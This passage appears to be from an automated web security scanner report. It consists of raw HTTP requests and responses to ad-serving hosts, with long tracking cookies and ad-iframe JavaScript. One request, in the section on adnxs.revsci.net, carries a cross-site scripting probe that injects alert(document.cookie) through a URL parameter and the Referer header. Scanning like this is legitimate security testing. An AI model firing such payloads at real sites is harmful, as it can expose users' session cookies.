!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!)=%@(m!#fBk!!!!)=%@(m!#fBm!!!!)=%@(m!#fBn!!!!)=%@(m!#fFG!!!!#=#T_g!#fG)!!!!$=%@(m!#fG+!!!!$=%@(m!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!*=%@(m!#g=r!!!!$=%@(m!#gsl!!!!#=#mS:!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#k]0!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!*=%=]S!#uR3!!!!$=%@(m!#uR7!!!!)=%@(m!#uRN!!!!#=#mS:!#uRP!!!!#=#mS:!#uY<!!!!#=!yv$!#v,U!!!!#=#mS:!#v,Y!!!!#=#mS:!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#9a!!!!#=%j],!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#X4!!!!#=#%VO!$#yu!!!!*=%=]S!$$K<!!!!#=#$.g!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!$=%@(m!$(!P!!!!)=%@(m!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!$=%@(m!$+Dr!!!!#=#mS:!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-,y!!!!#=#mS:!$-kY!!!!#=#mS:!$-kv!!!!#=#mS:!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5"; ih="b!!!!F!'4@g!!!!#=$KA3!)AU6!!!!#='htn!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.`.U!!!!#='htS!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2"; vuday1=!!!!#Gf(n`NBHr8H)J%d; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response 1

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:03:15 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0138.rm.bf1
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:03:15 GMT
Pragma: no-cache
Content-Length: 1054
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"600\" width=\"160\" src=\"http://ad.yieldmanager.com/iframe3?UbwUAKamGwArOGcAAAAAAFB0IgAAAAAAAAAEAAoAAAAAAAAAAQACB4gtLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg6wEAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADYkpz589I-CqHx0ZDUTSzXCjIZ-q8k4Ou1A3mxAAAAAA==,,http%3A%2F%2Fadopt.imiclk.com%2Femb%2Fq%3F01ad%3D2-2-b0214141ded1291a4ff0463d9e06444bd5100362c216df15cc667f2767bc1758-991ad395e12a9826d82de593d62cfbcfae28214d0237d0e3f7994e1df381cb11%2601ri%3D6bdf326c1d1d9d9%2601na%3D%26size%3D160x600%26m%3D3%26l%3D1575606%26c%3D162,B%3D10%26Z%3D160x600%26_salt%3D3382701272%26r%3D0%26s%3D1812134,bcb69758-95ac-11e0-81f2-cf18a6a4eabc\"></iframe>');
var rm_data = new Object();
rm_data.creative_id = 6764587;
rm_data.offer_type = 20;
rm_data.entity_id = 5787;
if (window.rm_crex_data) {rm_crex_data.push(6764587);}

Request 2

GET /imp?Z=160x600&s=1812134&_salt=3382701272&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!*!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$%ST~!%.B?!1UC$!%`n`!!!!$!?5%!$8o10!ZmB)!'mla!'me'~~~~~~=$G!==%EaVM.jTN!#+s2!,x.^!%)<k!0)2c!$tyl!6Z#3!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Jsh='HAD!!!([!#2Jp!,x.^!%)<k!2A@,!$u!!!7MU<!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Ju6='T?<!!!([!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!#Jl?!,x.^!%)<k!.#:A!%IaL!H<'$!?5%!(L(6:!w1K*!(#l)!#Ae[!%f(g~~~~~=$L#)=%JbC!!!([!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; bh="b!!!%*!!!?J!!!!(=$_d[!!(1-!!!!+=%=]S!!*lZ!!!!#=$Wj6!!*oY!!!!$=%@(m!!,WM!!!!#=$Wj6!!-?2!!!!)=%@(m!!-O3!!!!)=%@(m!!..X!!!!'=$L=p!!/GK!!!!+=%=]S!!/GR!!!!+=%=]S!!/Ju!!!!#=$_d[!!/K$!!!!%=%=]S!!/i,!!!!*=%@(m!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!*=%@(m!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!%=%=]S!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!,=%=]S!!J<K!!!!,=%=]S!!J<O!!!!*=%=]S!!J<S!!!!,=%=]S!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!*=%@(m!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!$=%@(m!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!)=%@(m!!Zwb!!!!$=%@(m!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!,=%=]S!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!$=%@(m!!kl,!!!!$=%@(m!!mL?!!!!#=%=pu!!mo!!!!!$=%@(m!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!$=%@(m!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!*=%@(m!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!*=%=]S!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!*=%=]S!#MTF!!!!'=%=]S!#MTH!!!!,=%=]S!#MTI!!!!,=%=]S!#MTJ!!!!,=%=]S!#Nyi!!!!#=!eq^!#O29!!!!(=%@(m!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!*=%@(m!#Sq>!!!!#='>m<!#T,d~~!#T^F!!!!#=!yv!!#UDQ!!!!,=%=]S!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!$=%@(m!#Z8E!!!!)=%@(m!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Z!!!!!(=%@(m!#]Z#!!!!$=%@(m!#]w)!!!!*=%=]S!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!*=%@(m!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!)=%@(m!#`-Z!!!!$=%=]S!#`-[!!!!$=%=]S!#`U0!!!!$=%@(m!#`cS!!!!#=%id8!#a=6!!!!$=%@(m!#a=7!!!!$=%@(m!#a=9!!!!$=%@(m!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#bj8!!!!#=#mS:!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!(=%@(m!#c8X!!!!(=%@(m!#c8c!!!!(=%@(m!#c8i!!!!(=%@(m!#c8m!!!!(=%@(m!#c8p!!!!(=%@(m!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!)=%@(m!#fBk!!!!)=%@(m!#fBm!!!!)=%@(m!#fBn!!!!)=%@(m!#fFG!!!!#=#T_g!#fG)!!!!$=%@(m!#fG+!!!!$=%@(m!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!*=%@(m!#g=r!!!!$=%@(m!#gsl!!!!#=#mS:!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#k]0!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!*=%=]S!#uR3!!!!$=%@(m!#uR7!!!!)=%@(m!#uRN!!!!#=#mS:!#uRP!!!!#=#mS:!#uY<!!!!#=!yv$!#v,U!!!!#=#mS:!#v,Y!!!!#=#mS:!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#9a!!!!#=%j],!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#X4!!!!#=#%VO!$#yu!!!!*=%=]S!$$K<!!!!#=#$.g!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!$=%@(m!$(!P!!!!)=%@(m!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!$=%@(m!$+Dr!!!!#=#mS:!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-,y!!!!#=#mS:!$-kY!!!!#=#mS:!$-kv!!!!#=#mS:!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5"; ih="b!!!!F!'4@g!!!!#=$KA3!)AU6!!!!#='htn!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.`.U!!!!#='htS!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2"; vuday1=!!!!#Gf(n`NBHr8H)J%d; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response 2

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:03:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0008.rm.bf1
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:03:32 GMT
Pragma: no-cache
Content-Length: 788
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"600\" width=\"160\" src=\"http://ad.yieldmanager.com/iframe3?AAAAAKamGwArOGcAAAAAAFB0IgAAAAAAAAAEAAoAAAAAAAEAAQACB4gtLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg6wEAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAotiAHBNM-CjPf94NWh52e543g-b2BXwJ.vIerAAAAAA==,,,B%3D10%26Z%3D160x600%26_salt%3D3382701272%26r%3D0%26s%3D1812134,c72b9b48-95ac-11e0-bd59-83e5650f50d3\"></iframe>');
var rm_data = new Object();
rm_data.creative_id = 6764587;
rm_data.offer_type = 20;
rm_data.entity_id = 5787;
if (window.rm_crex_data) {rm_crex_data.push(6764587);}

16.2. http://adnxs.revsci.net/imp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://adnxs.revsci.net
Path:	/imp

Request 1

GET /imp?Z=728x90&s=748066&r=1&_salt=1188639314&u=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e047724&2&10055,10194&4dde515c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e11aa0e&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4dec54ae&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3tvXN1o+eD1xyIxlcCzatusCBJfE++0lLQNuuXZ5CT4uCSvFPNQT0hWbCTwwMzUmQfYqdTBpI9P3N3q3chR3MaWlhMjJbUeocpd1O8Sgep+oaO+IjRgHcIUICJud0O7fqoub6TzalGXqnPwzJJ5UHJSv8ywcjnyWu9H1Wcq4/KgDP73Tkh6HLB0Z+W9dmaFbUDYEXkJJpS/iw75tOwTfW/giI2GJS9b7su1iFqfUhySYGYOfDr66p86QMf+3SfQ4fFb2Vu95sP8xVU7ZWYkqKbJ9lF5lwMZv0GFqT5FCANCoeasHEnwpVDhWPUUcyw3O+p/f6CtRpHq1uaDk8uR9A28Y/odkGciZh7BdP3QWkgS+R03ooqkAF8AQoY9798jZhSIyqMD+O6SUZzfQ8eOLFZ4AAD7HeRUnfiI8B1nXx1a5s7qlk7ClFgGL2Yq7H7+N2D4YiJprcBFz5fA7pP+kSJKLeO3W8jV+fLTzCGfRdkSjdf+RWEeCttzckiQvPAoC2QhDMQw0hXnRHTB1GmUyO5yjJA5BVOpdLjeZlZwv21g6KJUaXcSZIErbyiyEwjw62RnxdA7s/LzMfqxtu4aRGWXeXeTN5OLXSeLoL4b0+E4Zqi+3KFQa+kqdtj1O/Uc65tiz3oFHjnL7uM6b29XqgW36mdYJf89adJmpDywmcjAenBlttURV48nlyj2WhrDe7c3RTF71orGDwSGXQ9ITD2bLusjZmZ8DVXaVqq8gjQtB3Q0tNCzKXlHMC+WEOt0dZQQopNKg6tTWp2tcfg7djY9ScV1IlU6jHxtcmrfslpsawJMcFf4ejv0FxL7++UYuwpCrJAA70ropBNG81+SSRZaybc9VhfBssPc+Uu83WpqpFIyXGeCiRALOBfO1MBfVx01dJ/8xWrxsW6Kt3RCLNThehKTDVQoystHiA8DJ8JGsLNtM5T9kglABxc5q/C2SPQ0kzenYBk5z5hLecLP7BjpFppgUel3sfsVRC7axsMKyHU1L5SJQl7sneRxqKD1D7QAD3l8/OI/HyLQplLYh7pBm6nY2agtV9iM77mVnunJgFn0HrAzbZiMiqzgZYd3bJIvLOP1L3enggvJ1ySeUuoLsryCTCPGMmqUDWMQDuweD2bB/NCNIVYfDeg4Kbe3Ayl9sO7yfCGCMrq6gCTS7UirE/q3nlAA/GE3bxaDPhYPM192eTUaVBICJ0uyCPqidVm3spNzLnL1Xo4EVjkyNS/1FuCBooatVAkJSCkzrrdaSRucVP+4VvJLQFozrH9YXuIiN/MhejzIDoYuHEut5UjNuNGmteXVgVnT2HjB7TwKoS0Sr5NZzwuaYNN8/vkn79fazjkOovj02xfsuxH3hqE6sFAf8+NAXhY/UdyNW6HxTy8saA/jFzKuB5qb/kJmUEaAg/EIRLhBAfG6CbK8KNbLrIchGA1fYfUDeKEO5dw/0I7pV1rIoGkXPD+j1p7I7FUeNEdZ3O1ad/7JzNMKkzuVXQVkVYQfnrJK5LfJ1qkGgL3jQldlBDiEGo/Fhn/Zxvscjh42kHH1J4nAyN6jZTRKv9Tz6Fuv56uSvHIiqOwgFoTGhEzt1k0ZHfM/5MO4sDbKMniVh+BbO8KpbZaTqsTNklzTkHPYdFWnA1/Imf2J7oiHp8nq7IWdDJ9IgiUWYNMRUJk76JvRI68ooK5NdD/t9uk3T01csXkVupfPIHpU0pVUKXch7fKhaanmX9RrTHO1KK8l/H/IK8VLviuOjDLQyTBR5r/rFnaqw31EU1wt7AqzRQv0MtLt5AhBy10UG7hHJ/582xNFtZVdIzV3+sMUymXk+e7aW; rsi_segs_1000000=pUPF5E+huQIMpzaxu2F29/z47hsEuy70RDTXd+G914J5660Uet4p7ETo+SWdpq+vjO9FyOb/GDElu8b1fCaRSIFw62TMPNHPf1Uqx8gUmMOMvyrrcedIMSklF2GlAYMSmIrtIJZyfP4Pyydb8gGQEEVPTWfUru16M3wgUTloRa1DGnHu9DnMc1auc8rlJvnrDyarDpRAiyIQYfRUCqgexMmvNfqE58La5XcyKE+kxELSBAa1/zYpbUyjmtOB0OtvZe/sCmSBGoAR5kOdyqrD2IhtKDv6Hm7ELwKhW1/80SlfI4rFnrJLbX7UnZAInsxa5gAJo4kYyL9wP83gjFu21v+Ljbe4JXONNcHEu0Gce1eCZSt7gMMJj5hcBujncOuzwe6JValzqkoUzG3Z4l7x9W4n035r+Thm+1dBZiGPuPRK62f5dqbS5k+dfOEB2C4Ac8yHd6NRXOls5lzqtCiPtU3yh7HMbMC7FKV4ntBCpgQuJVZdV4gB5DHvE8DJH5mJADuT5I9HoKBabFdqyGaatksuvficHH6shBTimFXWQqrZvS0wJISpelTmvT6MMLL6uX+IxeAKTal7iL3J/Ugmq+Y=; rtc_uJev=MLv/+QUJZjpn51IpAxjOavnaN4hKHsFKsArs1un9DiMi54ZO4wU4y0HsTfVxQcrrHSlE5FfEOUQroSDJyCQsxdLt7/+VDDyQPWRIX0xytnLBcQo53lKbEFpO3wIAuZz8HZvTV4jq26xTQlJbMB51kHXRMAfIYvU73OSE4v31+q1AsUQlmSW4MDxsUSl5syf9EAwGgMz8aTvWQss79Aoznerv/oPoLcS3IZ+nWYWt+OUqy+XB+Z60V8o7HQEhaE3h69iJIn8VtBpn+JyggNrNZP6VE97ADibCZgnznBHV4DQAPlI5qn054L4TEnkAg74ZDWQcD2+RFoWZBsYuvxEiPGirR+WcagTHF5VLx+nbqzqWKSXuZznwqyEnYlBZlUSMiSfGOoGVGMZlj87aQGSBYaESVnBO1uZ+YvFCIZJaEs5noLzF9OvdIjFsqjm2CXCcjyBP0B3WamO/GKhCvFjJwLorslmR8lc1xhZEq2W9AThoxiDM2IPsMHPt00376pU9pxVxN4J4i7BaEsFj71txvTn8wxVHX2mJYKppvllHdj4p/TXP8vuko61EuIhnljjwr+r2y/QmWzZfKqIejE1/03rU76tNeFBRDWR8aOyipbeh+uyTUpNI4F5CYz7Gvx2cycfmR+h+2FFCiEnrGz5xIiEZe+vlbLuOP1Teb0Mm5AoWhxh5E4NHL8ip21OpNqRAst/Owp+rabyr+y/wSDSU+PgbsrPOrZuP5DdctZS2vZ31/BspFFynU0vInbd6C8M41e7tObXyHbSc6JY6oL+ry8yJypsCxvlch7UL9bFNYKo3QoHT/b0K24rjLq7b5CyoVKlSHFsYW/nT1UbxVRlK9xjsUKgOW8+WD7LLJ9aLBOSXxXEa2gDU+FShT/yVZ5ST8Gz7fXtIczqrXFvAz8gojNIMCeZLGGJGSr78JZ9B5hC0PJWZsjLvZEMR9emYXBe71pQr3U5g6O2gnG1Q1x4RFm1ZsuLTctS2Np44xP9z1I01uEqcYVAaRagWGq3VZfYeqkuoIKPi9MID+Ndo1pamWoRhdiBEgrN8lO7+XLOBqApQ7zAcuZmjE79m8JfUvicISIu1O2QI93UXBytj5kmlaOEzXPGeEPnLopVuqvJFT7XOoD95J4ws49PwJ+b41WcNJEVpXCnmGfcw8Ej5o/D5gQrEGOQbM2/Di7zsqPFXCk86l8pOcnoG0KnNkQOrdlhL0nMtTPxLFVJrxsWl2mdpxlk1grOkmm7m55QD6zgCVxLlBr5W8BY3nx8MiGYxs6KwwKe9uC+UDtslJGuHjK3vuQ5LI5FUjgWFctA6iJzjR0icFenZZ//wsVxgnH/AWVfu6vF+4a3RpKHlQXo/pra89IahUKf47qaLJWe+MNyvehXi5zuM84yZ4jFAGTkXh3HNCMYB16La9jg3t61HuYu2OIPNgP2I6I8tKA/ddo95qmopGg1jO43mLmFxgw4jb3T5pohnBBGs9+VPqCDIH6fSfj4KT+Rq+SNTGT7GfVEEKjwlKoNUNuIfawbdFDh6vB1VD0LW3DoOKTu7bNZ0zmnOWEjGMwebwQJRel1UTreh58fk0xF4gmP2UyeCCLNFcjK1vTciJUUwxoD2b2Y4enJAjiKy+KHl4t4BEUiBU+PwDLGt2Yc2brjSeJv7T6uHZrAsKqTRn48kG3AJXwOH7Mx7OE1yp1NoSHAyf22LDiTxLdP56pliRIjXpaTOT5ht8EbsH2uvTGXedE4iACnn7pwC9AMI6JByiXZotWH9gO8HP2GMoEiL7+6BashzcvvO7rt5EFMabkI7W